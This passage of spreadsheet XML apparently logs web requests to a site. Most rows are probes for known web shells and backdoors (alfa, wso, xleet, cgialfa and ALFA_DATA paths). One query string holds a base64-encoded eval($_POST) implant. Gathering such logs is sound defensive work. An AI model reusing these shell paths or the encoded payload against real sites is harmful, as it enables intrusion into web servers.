    <row r="3850" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3850" s="1">
        <v>45213.285682870373</v>
      </c>
      <c r="B3850" t="s">
        <v>863</v>
      </c>
      <c r="C3850" t="s">
        <v>864</v>
      </c>
      <c r="D3850" t="str">
        <f t="shared" si="60"/>
        <v>sellers.json</v>
      </c>
      <c r="E3850" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="3851" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3851" s="1">
        <v>45212.65457175926</v>
      </c>
      <c r="B3851" t="s">
        <v>1395</v>
      </c>
      <c r="C3851" t="s">
        <v>1249</v>
      </c>
      <c r="D3851" t="str">
        <f t="shared" si="60"/>
        <v>style.php?sig=update&amp;domain=51.79.124.111</v>
      </c>
      <c r="E3851" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3852" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3852" s="1">
        <v>45212.327627314815</v>
      </c>
      <c r="B3852" t="s">
        <v>1292</v>
      </c>
      <c r="C3852" t="s">
        <v>298</v>
      </c>
      <c r="D3852" t="str">
        <f t="shared" si="60"/>
        <v>inputs.php</v>
      </c>
      <c r="E3852" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3853" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3853" s="1">
        <v>45212.267129629632</v>
      </c>
      <c r="B3853" t="s">
        <v>863</v>
      </c>
      <c r="C3853" t="s">
        <v>864</v>
      </c>
      <c r="D3853" t="str">
        <f t="shared" si="60"/>
        <v>sellers.json</v>
      </c>
      <c r="E3853" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="3854" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3854" s="1">
        <v>45211.256747685184</v>
      </c>
      <c r="B3854" t="s">
        <v>863</v>
      </c>
      <c r="C3854" t="s">
        <v>864</v>
      </c>
      <c r="D3854" t="str">
        <f t="shared" si="60"/>
        <v>sellers.json</v>
      </c>
      <c r="E3854" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="3855" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3855" s="1">
        <v>45210.839861111112</v>
      </c>
      <c r="B3855" t="s">
        <v>1289</v>
      </c>
      <c r="C3855" t="s">
        <v>41</v>
      </c>
      <c r="D3855" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E3855" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3856" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3856" s="1">
        <v>45210.839560185188</v>
      </c>
      <c r="B3856" t="s">
        <v>1289</v>
      </c>
      <c r="C3856" t="s">
        <v>41</v>
      </c>
      <c r="D3856" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E3856" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3857" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3857" s="1">
        <v>45210.391817129632</v>
      </c>
      <c r="B3857" t="s">
        <v>1408</v>
      </c>
      <c r="C3857" t="s">
        <v>779</v>
      </c>
      <c r="D3857" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/core/include.php</v>
      </c>
      <c r="E3857" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3858" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3858" s="1">
        <v>45210.29011574074</v>
      </c>
      <c r="B3858" t="s">
        <v>863</v>
      </c>
      <c r="C3858" t="s">
        <v>864</v>
      </c>
      <c r="D3858" t="str">
        <f t="shared" si="60"/>
        <v>sellers.json</v>
      </c>
      <c r="E3858" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="3859" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3859" s="1">
        <v>45210.047094907408</v>
      </c>
      <c r="B3859" t="s">
        <v>1409</v>
      </c>
      <c r="C3859" t="s">
        <v>1410</v>
      </c>
      <c r="D3859" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/core/include.php</v>
      </c>
      <c r="E3859" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3860" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3860" s="1">
        <v>45209.808842592596</v>
      </c>
      <c r="B3860" t="s">
        <v>1411</v>
      </c>
      <c r="C3860" t="s">
        <v>1249</v>
      </c>
      <c r="D3860" t="str">
        <f t="shared" si="60"/>
        <v>style.php?sig=update&amp;domain=51.79.124.111</v>
      </c>
      <c r="E3860" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3861" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3861" s="1">
        <v>45209.807847222219</v>
      </c>
      <c r="B3861" t="s">
        <v>1412</v>
      </c>
      <c r="C3861" t="s">
        <v>779</v>
      </c>
      <c r="D3861" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/core/include.php</v>
      </c>
      <c r="E3861" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3862" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3862" s="1">
        <v>45209.781319444446</v>
      </c>
      <c r="B3862" t="s">
        <v>1409</v>
      </c>
      <c r="C3862" t="s">
        <v>779</v>
      </c>
      <c r="D3862" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/core/include.php</v>
      </c>
      <c r="E3862" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3863" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3863" s="1">
        <v>45209.631539351853</v>
      </c>
      <c r="B3863" t="s">
        <v>1413</v>
      </c>
      <c r="C3863" t="s">
        <v>1414</v>
      </c>
      <c r="D3863" t="str">
        <f t="shared" si="60"/>
        <v>/wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==</v>
      </c>
      <c r="E3863" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3864" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3864" s="1">
        <v>45209.289861111109</v>
      </c>
      <c r="B3864" t="s">
        <v>863</v>
      </c>
      <c r="C3864" t="s">
        <v>864</v>
      </c>
      <c r="D3864" t="str">
        <f t="shared" si="60"/>
        <v>sellers.json</v>
      </c>
      <c r="E3864" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="3865" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3865" s="1">
        <v>45209.142789351848</v>
      </c>
      <c r="B3865" t="s">
        <v>1415</v>
      </c>
      <c r="C3865" t="s">
        <v>779</v>
      </c>
      <c r="D3865" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/core/include.php</v>
      </c>
      <c r="E3865" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3866" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3866" s="1">
        <v>45209.142581018517</v>
      </c>
      <c r="B3866" t="s">
        <v>1415</v>
      </c>
      <c r="C3866" t="s">
        <v>779</v>
      </c>
      <c r="D3866" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/core/include.php</v>
      </c>
      <c r="E3866" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3867" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3867" s="1">
        <v>45209.142430555556</v>
      </c>
      <c r="B3867" t="s">
        <v>1415</v>
      </c>
      <c r="C3867" t="s">
        <v>1416</v>
      </c>
      <c r="D3867" t="str">
        <f t="shared" si="60"/>
        <v>admin-ajax.php</v>
      </c>
      <c r="E3867" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3868" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3868" s="1">
        <v>45209.142233796294</v>
      </c>
      <c r="B3868" t="s">
        <v>1415</v>
      </c>
      <c r="C3868" t="s">
        <v>317</v>
      </c>
      <c r="D3868" t="str">
        <f t="shared" si="60"/>
        <v>simple.php</v>
      </c>
      <c r="E3868" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3869" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3869" s="1">
        <v>45208.937083333331</v>
      </c>
      <c r="B3869" t="s">
        <v>1417</v>
      </c>
      <c r="C3869" t="s">
        <v>893</v>
      </c>
      <c r="D3869" t="str">
        <f t="shared" si="60"/>
        <v>shells.php</v>
      </c>
      <c r="E3869" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3870" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3870" s="1">
        <v>45208.937071759261</v>
      </c>
      <c r="B3870" t="s">
        <v>1417</v>
      </c>
      <c r="C3870" t="s">
        <v>391</v>
      </c>
      <c r="D3870" t="str">
        <f t="shared" si="60"/>
        <v>about.php</v>
      </c>
      <c r="E3870" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3871" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3871" s="1">
        <v>45208.937060185184</v>
      </c>
      <c r="B3871" t="s">
        <v>1417</v>
      </c>
      <c r="C3871" t="s">
        <v>876</v>
      </c>
      <c r="D3871" t="str">
        <f t="shared" si="60"/>
        <v>templates/beez3/</v>
      </c>
      <c r="E3871" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3872" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3872" s="1">
        <v>45208.937048611115</v>
      </c>
      <c r="B3872" t="s">
        <v>1417</v>
      </c>
      <c r="C3872" t="s">
        <v>879</v>
      </c>
      <c r="D3872" t="str">
        <f t="shared" si="60"/>
        <v>alfa.php</v>
      </c>
      <c r="E3872" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3873" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3873" s="1">
        <v>45208.937048611115</v>
      </c>
      <c r="B3873" t="s">
        <v>1417</v>
      </c>
      <c r="C3873" t="s">
        <v>878</v>
      </c>
      <c r="D3873" t="str">
        <f t="shared" si="60"/>
        <v>config.php</v>
      </c>
      <c r="E3873" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3874" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3874" s="1">
        <v>45208.937037037038</v>
      </c>
      <c r="B3874" t="s">
        <v>1417</v>
      </c>
      <c r="C3874" t="s">
        <v>880</v>
      </c>
      <c r="D3874" t="str">
        <f t="shared" si="60"/>
        <v>wp.php</v>
      </c>
      <c r="E3874" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3875" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3875" s="1">
        <v>45208.937025462961</v>
      </c>
      <c r="B3875" t="s">
        <v>1417</v>
      </c>
      <c r="C3875" t="s">
        <v>882</v>
      </c>
      <c r="D3875" t="str">
        <f t="shared" si="60"/>
        <v>a.php</v>
      </c>
      <c r="E3875" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3876" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3876" s="1">
        <v>45208.937025462961</v>
      </c>
      <c r="B3876" t="s">
        <v>1417</v>
      </c>
      <c r="C3876" t="s">
        <v>881</v>
      </c>
      <c r="D3876" t="str">
        <f t="shared" si="60"/>
        <v>test.php</v>
      </c>
      <c r="E3876" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3877" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3877" s="1">
        <v>45208.937013888892</v>
      </c>
      <c r="B3877" t="s">
        <v>1417</v>
      </c>
      <c r="C3877" t="s">
        <v>883</v>
      </c>
      <c r="D3877" t="str">
        <f t="shared" si="60"/>
        <v>z.php</v>
      </c>
      <c r="E3877" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3878" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3878" s="1">
        <v>45208.937002314815</v>
      </c>
      <c r="B3878" t="s">
        <v>1417</v>
      </c>
      <c r="C3878" t="s">
        <v>884</v>
      </c>
      <c r="D3878" t="str">
        <f t="shared" si="60"/>
        <v>x.php</v>
      </c>
      <c r="E3878" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3879" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3879" s="1">
        <v>45208.936979166669</v>
      </c>
      <c r="B3879" t="s">
        <v>1417</v>
      </c>
      <c r="C3879" t="s">
        <v>885</v>
      </c>
      <c r="D3879" t="str">
        <f t="shared" si="60"/>
        <v>1.php</v>
      </c>
      <c r="E3879" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3880" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3880" s="1">
        <v>45208.936921296299</v>
      </c>
      <c r="B3880" t="s">
        <v>1417</v>
      </c>
      <c r="C3880" t="s">
        <v>886</v>
      </c>
      <c r="D3880" t="str">
        <f t="shared" si="60"/>
        <v>fox.php</v>
      </c>
      <c r="E3880" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3881" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3881" s="1">
        <v>45208.936874999999</v>
      </c>
      <c r="B3881" t="s">
        <v>1417</v>
      </c>
      <c r="C3881" t="s">
        <v>887</v>
      </c>
      <c r="D3881" t="str">
        <f t="shared" si="60"/>
        <v>upload.php</v>
      </c>
      <c r="E3881" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3882" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3882" s="1">
        <v>45208.936851851853</v>
      </c>
      <c r="B3882" t="s">
        <v>1417</v>
      </c>
      <c r="C3882" t="s">
        <v>888</v>
      </c>
      <c r="D3882" t="str">
        <f t="shared" si="60"/>
        <v>up.php</v>
      </c>
      <c r="E3882" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3883" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3883" s="1">
        <v>45208.936851851853</v>
      </c>
      <c r="B3883" t="s">
        <v>1417</v>
      </c>
      <c r="C3883" t="s">
        <v>887</v>
      </c>
      <c r="D3883" t="str">
        <f t="shared" si="60"/>
        <v>upload.php</v>
      </c>
      <c r="E3883" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3884" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3884" s="1">
        <v>45208.936840277776</v>
      </c>
      <c r="B3884" t="s">
        <v>1417</v>
      </c>
      <c r="C3884" t="s">
        <v>889</v>
      </c>
      <c r="D3884" t="str">
        <f t="shared" si="60"/>
        <v>shell.php</v>
      </c>
      <c r="E3884" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3885" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3885" s="1">
        <v>45208.936828703707</v>
      </c>
      <c r="B3885" t="s">
        <v>1417</v>
      </c>
      <c r="C3885" t="s">
        <v>890</v>
      </c>
      <c r="D3885" t="str">
        <f t="shared" si="60"/>
        <v>wso.php</v>
      </c>
      <c r="E3885" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3886" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3886" s="1">
        <v>45208.93681712963</v>
      </c>
      <c r="B3886" t="s">
        <v>1417</v>
      </c>
      <c r="C3886" t="s">
        <v>891</v>
      </c>
      <c r="D3886" t="str">
        <f t="shared" si="60"/>
        <v>xleet.php</v>
      </c>
      <c r="E3886" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3887" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3887" s="1">
        <v>45208.936805555553</v>
      </c>
      <c r="B3887" t="s">
        <v>1417</v>
      </c>
      <c r="C3887" t="s">
        <v>892</v>
      </c>
      <c r="D3887" t="str">
        <f t="shared" si="60"/>
        <v>olux.php</v>
      </c>
      <c r="E3887" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3888" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3888" s="1">
        <v>45208.936793981484</v>
      </c>
      <c r="B3888" t="s">
        <v>1417</v>
      </c>
      <c r="C3888" t="s">
        <v>895</v>
      </c>
      <c r="D3888" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/plugins/ubh/up.php</v>
      </c>
      <c r="E3888" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3889" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3889" s="1">
        <v>45208.936793981484</v>
      </c>
      <c r="B3889" t="s">
        <v>1417</v>
      </c>
      <c r="C3889" t="s">
        <v>894</v>
      </c>
      <c r="D3889" t="str">
        <f t="shared" si="60"/>
        <v>?3x=3x</v>
      </c>
      <c r="E3889" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3890" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3890" s="1">
        <v>45208.935937499999</v>
      </c>
      <c r="B3890" t="s">
        <v>1417</v>
      </c>
      <c r="C3890" t="s">
        <v>896</v>
      </c>
      <c r="D3890" t="str">
        <f t="shared" si="60"/>
        <v>admin/controller/extension/extension/cgialfa</v>
      </c>
      <c r="E3890" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3891" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3891" s="1">
        <v>45208.935914351852</v>
      </c>
      <c r="B3891" t="s">
        <v>1417</v>
      </c>
      <c r="C3891" t="s">
        <v>897</v>
      </c>
      <c r="D3891" t="str">
        <f t="shared" si="60"/>
        <v>admin/controller/extension/extension/alfacgiapi</v>
      </c>
      <c r="E3891" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3892" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3892" s="1">
        <v>45208.935891203706</v>
      </c>
      <c r="B3892" t="s">
        <v>1417</v>
      </c>
      <c r="C3892" t="s">
        <v>898</v>
      </c>
      <c r="D3892" t="str">
        <f t="shared" si="60"/>
        <v>admin/controller/extension/extension/ALFA_DATA</v>
      </c>
      <c r="E3892" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3893" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3893" s="1">
        <v>45208.935810185183</v>
      </c>
      <c r="B3893" t="s">
        <v>1417</v>
      </c>
      <c r="C3893" t="s">
        <v>899</v>
      </c>
      <c r="D3893" t="str">
        <f t="shared" si="60"/>
        <v>sites/default/files/cgialfa</v>
      </c>
      <c r="E3893" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3894" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3894" s="1">
        <v>45208.935763888891</v>
      </c>
      <c r="B3894" t="s">
        <v>1417</v>
      </c>
      <c r="C3894" t="s">
        <v>900</v>
      </c>
      <c r="D3894" t="str">
        <f t="shared" si="60"/>
        <v>sites/default/files/alfacgiapi</v>
      </c>
      <c r="E3894" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3895" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3895" s="1">
        <v>45208.935740740744</v>
      </c>
      <c r="B3895" t="s">
        <v>1417</v>
      </c>
      <c r="C3895" t="s">
        <v>901</v>
      </c>
      <c r="D3895" t="str">
        <f t="shared" si="60"/>
        <v>sites/default/files/ALFA_DATA</v>
      </c>
      <c r="E3895" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3896" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3896" s="1">
        <v>45208.935717592591</v>
      </c>
      <c r="B3896" t="s">
        <v>1417</v>
      </c>
      <c r="C3896" t="s">
        <v>902</v>
      </c>
      <c r="D3896" t="str">
        <f t="shared" si="60"/>
        <v>templates/beez3/cgialfa</v>
      </c>
      <c r="E3896" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3897" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3897" s="1">
        <v>45208.935706018521</v>
      </c>
      <c r="B3897" t="s">
        <v>1417</v>
      </c>
      <c r="C3897" t="s">
        <v>903</v>
      </c>
      <c r="D3897" t="str">
        <f t="shared" si="60"/>
        <v>templates/beez3/alfacgiapi</v>
      </c>
      <c r="E3897" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3898" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3898" s="1">
        <v>45208.935694444444</v>
      </c>
      <c r="B3898" t="s">
        <v>1417</v>
      </c>
      <c r="C3898" t="s">
        <v>904</v>
      </c>
      <c r="D3898" t="str">
        <f t="shared" si="60"/>
        <v>templates/beez3/ALFA_DATA</v>
      </c>
      <c r="E3898" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3899" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3899" s="1">
        <v>45208.935682870368</v>
      </c>
      <c r="B3899" t="s">
        <v>1417</v>
      </c>
      <c r="C3899" t="s">
        <v>905</v>
      </c>
      <c r="D3899" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/cgialfa</v>
      </c>
      <c r="E3899" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3900" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3900" s="1">
        <v>45208.935659722221</v>
      </c>
      <c r="B3900" t="s">
        <v>1417</v>
      </c>
      <c r="C3900" t="s">
        <v>906</v>
      </c>
      <c r="D3900" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/alfacgiapi</v>
      </c>
      <c r="E3900" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3901" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3901" s="1">
        <v>45208.935636574075</v>
      </c>
      <c r="B3901" t="s">
        <v>1417</v>
      </c>
      <c r="C3901" t="s">
        <v>907</v>
      </c>
      <c r="D3901" t="str">
        <f t="shared" si="60"/>
        <v>wp-content/ALFA_DATA</v>
      </c>
      <c r="E3901" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3902" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3902" s="1">
        <v>45208.935613425929</v>
      </c>
      <c r="B3902" t="s">
        <v>1417</v>
      </c>
      <c r="C3902" t="s">
        <v>908</v>
      </c>
      <c r="D3902" t="str">
        <f t="shared" si="60"/>
        <v>wp-admin/cgialfa</v>
      </c>
      <c r="E3902" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3903" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3903" s="1">
        <v>45208.935601851852</v>
      </c>
      <c r="B3903" t="s">
        <v>1417</v>
      </c>
      <c r="C3903" t="s">
        <v>909</v>
      </c>
      <c r="D3903" t="str">
        <f t="shared" si="60"/>
        <v>wp-admin/alfacgiapi</v>
      </c>
      <c r="E3903" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3904" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3904" s="1">
        <v>45208.935567129629</v>
      </c>
      <c r="B3904" t="s">
        <v>1417</v>
      </c>
      <c r="C3904" t="s">
        <v>910</v>
      </c>
      <c r="D3904" t="str">
        <f t="shared" si="60"/>
        <v>wp-admin/ALFA_DATA</v>
      </c>
      <c r="E3904" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3905" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3905" s="1">
        <v>45208.935543981483</v>
      </c>
      <c r="B3905" t="s">
        <v>1417</v>
      </c>
      <c r="C3905" t="s">
        <v>911</v>
      </c>
      <c r="D3905" t="str">
        <f t="shared" si="60"/>
        <v>wp-includes/cgialfa</v>
      </c>
      <c r="E3905" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3906" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3906" s="1">
        <v>45208.935532407406</v>
      </c>
      <c r="B3906" t="s">
        <v>1417</v>
      </c>
      <c r="C3906" t="s">
        <v>912</v>
      </c>
      <c r="D3906" t="str">
        <f t="shared" ref="D3906:D3969" si="61">MID(C3906,FIND("#", SUBSTITUTE(C3906, "/", "#", 3))+1,LEN(C3906)-FIND("#", SUBSTITUTE(C3906, "/", "#", 3))+1)</f>
        <v>wp-includes/alfacgiapi</v>
      </c>
      <c r="E3906" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3907" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3907" s="1">
        <v>45208.93550925926</v>
      </c>
      <c r="B3907" t="s">
        <v>1417</v>
      </c>
      <c r="C3907" t="s">
        <v>913</v>
      </c>
      <c r="D3907" t="str">
        <f t="shared" si="61"/>
        <v>wp-includes/ALFA_DATA</v>
      </c>
      <c r="E3907" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3908" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3908" s="1">
        <v>45208.935486111113</v>
      </c>
      <c r="B3908" t="s">
        <v>1417</v>
      </c>
      <c r="C3908" t="s">
        <v>914</v>
      </c>
      <c r="D3908" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/uploads/cgialfa</v>
      </c>
      <c r="E3908" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3909" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3909" s="1">
        <v>45208.93546296296</v>
      </c>
      <c r="B3909" t="s">
        <v>1417</v>
      </c>
      <c r="C3909" t="s">
        <v>915</v>
      </c>
      <c r="D3909" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/uploads/alfacgiapi</v>
      </c>
      <c r="E3909" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3910" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3910" s="1">
        <v>45208.93545138889</v>
      </c>
      <c r="B3910" t="s">
        <v>1417</v>
      </c>
      <c r="C3910" t="s">
        <v>916</v>
      </c>
      <c r="D3910" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/uploads/ALFA_DATA</v>
      </c>
      <c r="E3910" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3911" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3911" s="1">
        <v>45208.935439814813</v>
      </c>
      <c r="B3911" t="s">
        <v>1417</v>
      </c>
      <c r="C3911" t="s">
        <v>917</v>
      </c>
      <c r="D3911" t="str">
        <f t="shared" si="61"/>
        <v>.well-known/cgialfa</v>
      </c>
      <c r="E3911" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3912" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3912" s="1">
        <v>45208.935416666667</v>
      </c>
      <c r="B3912" t="s">
        <v>1417</v>
      </c>
      <c r="C3912" t="s">
        <v>918</v>
      </c>
      <c r="D3912" t="str">
        <f t="shared" si="61"/>
        <v>.well-known/alfacgiapi</v>
      </c>
      <c r="E3912" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3913" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3913" s="1">
        <v>45208.935393518521</v>
      </c>
      <c r="B3913" t="s">
        <v>1417</v>
      </c>
      <c r="C3913" t="s">
        <v>919</v>
      </c>
      <c r="D3913" t="str">
        <f t="shared" si="61"/>
        <v>.well-known/ALFA_DATA</v>
      </c>
      <c r="E3913" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3914" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3914" s="1">
        <v>45208.935358796298</v>
      </c>
      <c r="B3914" t="s">
        <v>1417</v>
      </c>
      <c r="C3914" t="s">
        <v>920</v>
      </c>
      <c r="D3914" t="str">
        <f t="shared" si="61"/>
        <v>cgialfa</v>
      </c>
      <c r="E3914" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3915" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3915" s="1">
        <v>45208.934618055559</v>
      </c>
      <c r="B3915" t="s">
        <v>1417</v>
      </c>
      <c r="C3915" t="s">
        <v>922</v>
      </c>
      <c r="D3915" t="str">
        <f t="shared" si="61"/>
        <v>ALFA_DATA</v>
      </c>
      <c r="E3915" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3916" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3916" s="1">
        <v>45208.933240740742</v>
      </c>
      <c r="B3916" t="s">
        <v>1417</v>
      </c>
      <c r="C3916" t="s">
        <v>923</v>
      </c>
      <c r="D3916" t="str">
        <f t="shared" si="61"/>
        <v>error.php?phpshells</v>
      </c>
      <c r="E3916" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3917" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3917" s="1">
        <v>45208.932523148149</v>
      </c>
      <c r="B3917" t="s">
        <v>1417</v>
      </c>
      <c r="C3917" t="s">
        <v>924</v>
      </c>
      <c r="D3917" t="str">
        <f t="shared" si="61"/>
        <v>wp-backup-sql-302.php</v>
      </c>
      <c r="E3917" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3918" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3918" s="1">
        <v>45208.932337962964</v>
      </c>
      <c r="B3918" t="s">
        <v>1417</v>
      </c>
      <c r="C3918" t="s">
        <v>925</v>
      </c>
      <c r="D3918" t="str">
        <f t="shared" si="61"/>
        <v>system_log.php?bala=up</v>
      </c>
      <c r="E3918" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3919" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3919" s="1">
        <v>45208.930486111109</v>
      </c>
      <c r="B3919" t="s">
        <v>1417</v>
      </c>
      <c r="C3919" t="s">
        <v>926</v>
      </c>
      <c r="D3919" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/outcms.php?up</v>
      </c>
      <c r="E3919" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3920" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3920" s="1">
        <v>45208.925034722219</v>
      </c>
      <c r="B3920" t="s">
        <v>1417</v>
      </c>
      <c r="C3920" t="s">
        <v>927</v>
      </c>
      <c r="D3920" t="str">
        <f t="shared" si="61"/>
        <v>defau11.php</v>
      </c>
      <c r="E3920" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3921" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3921" s="1">
        <v>45208.923784722225</v>
      </c>
      <c r="B3921" t="s">
        <v>1417</v>
      </c>
      <c r="C3921" t="s">
        <v>929</v>
      </c>
      <c r="D3921" t="str">
        <f t="shared" si="61"/>
